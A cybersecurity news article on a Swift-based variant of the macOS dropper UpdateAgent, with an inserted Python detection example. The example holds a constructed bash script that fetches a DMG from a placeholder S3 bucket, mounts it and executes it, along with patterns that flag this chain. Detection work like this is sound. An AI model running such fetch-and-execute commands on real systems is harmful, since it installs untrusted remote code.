UpdateAgent Returns with New macOS Malware Dropper Written in Swift

Cyber Security


A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities.

“Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server,” researchers from Jamf Threat Labs said in a report.

UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.

The newly discovered Swift-based dropper masquerades as Mach-O binaries named “PDFCreator” and “ActiveDirectory” that, upon execution, connect to a remote server and retrieve a bash script to execute.


“The primary difference [between the two executables] is that it reaches out to a different URL from which it should load a bash script,” the researchers noted.

These bash scripts, named “activedirec.sh” or “bash_qolveevgclr.sh”, include a URL pointing to Amazon S3 buckets, from which a second-stage disk image (DMG) file is downloaded to the compromised endpoint and run.
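As an added defender-side example (not code from the Jamf report or this article): a small Python checker that flags a retrieved shell script showing the stage-two chain described above, i.e. a payload URL on Amazon S3, a DMG download, and mounting and executing it. The sample script, bucket name, file names and the `hdiutil`/`/Volumes` heuristics are constructed for this illustration, not real indicators.

```python
import re

# Constructed sample of a stage-one script in the shape the article describes:
# pull a DMG from an S3 bucket, mount it, and launch what is inside.
# Bucket, paths and file names are made up for this example.
SAMPLE_SCRIPT = """#!/bin/bash
curl -s -o /tmp/update.dmg https://example-bucket.s3.amazonaws.com/stage2/update.dmg
hdiutil attach -nobrowse -quiet /tmp/update.dmg
/Volumes/Update/Install.app/Contents/MacOS/Install &
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Matches S3 hosts in virtual-hosted style (bucket.s3.amazonaws.com,
# bucket.s3.<region>.amazonaws.com) and path style (s3.<region>.amazonaws.com,
# s3-<region>.amazonaws.com). Only the host is checked, never the path.
S3_HOST_RE = re.compile(r"(^|\.)s3([.-][a-z0-9-]+)?\.amazonaws\.com$", re.I)


def extract_urls(script: str) -> list:
    """Return every http(s) URL found in the script text."""
    return URL_RE.findall(script)


def is_s3_url(url: str) -> bool:
    """True if the URL's host is an Amazon S3 endpoint."""
    host = re.sub(r"^https?://", "", url).split("/", 1)[0].split(":")[0]
    return bool(S3_HOST_RE.search(host))


def score_script(script: str) -> dict:
    """Collect findings for the S3 -> DMG -> mount -> execute pattern."""
    urls = extract_urls(script)
    s3_urls = [u for u in urls if is_s3_url(u)]
    findings = []
    if s3_urls:
        findings.append("s3_payload_url")
    if any(u.lower().endswith(".dmg") for u in s3_urls):
        findings.append("dmg_from_s3")
    if re.search(r"\bhdiutil\s+attach\b", script):
        findings.append("mounts_dmg")
    if re.search(r"/Volumes/\S+", script):
        findings.append("executes_from_mounted_volume")
    # Heuristic verdict: an S3-hosted DMG that the script also mounts.
    suspicious = "dmg_from_s3" in findings and "mounts_dmg" in findings
    return {"urls": urls, "s3_urls": s3_urls,
            "findings": findings, "suspicious": suspicious}


if __name__ == "__main__":
    print(score_script(SAMPLE_SCRIPT))
```

The verdict is a triage aid only; the URL list and per-finding tags are what an analyst would pivot on when reviewing a script fetched by an unsigned binary.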

“The continued development of this malware shows that its authors continue to remain active, trying to reach as many users as possible,” the researchers said.
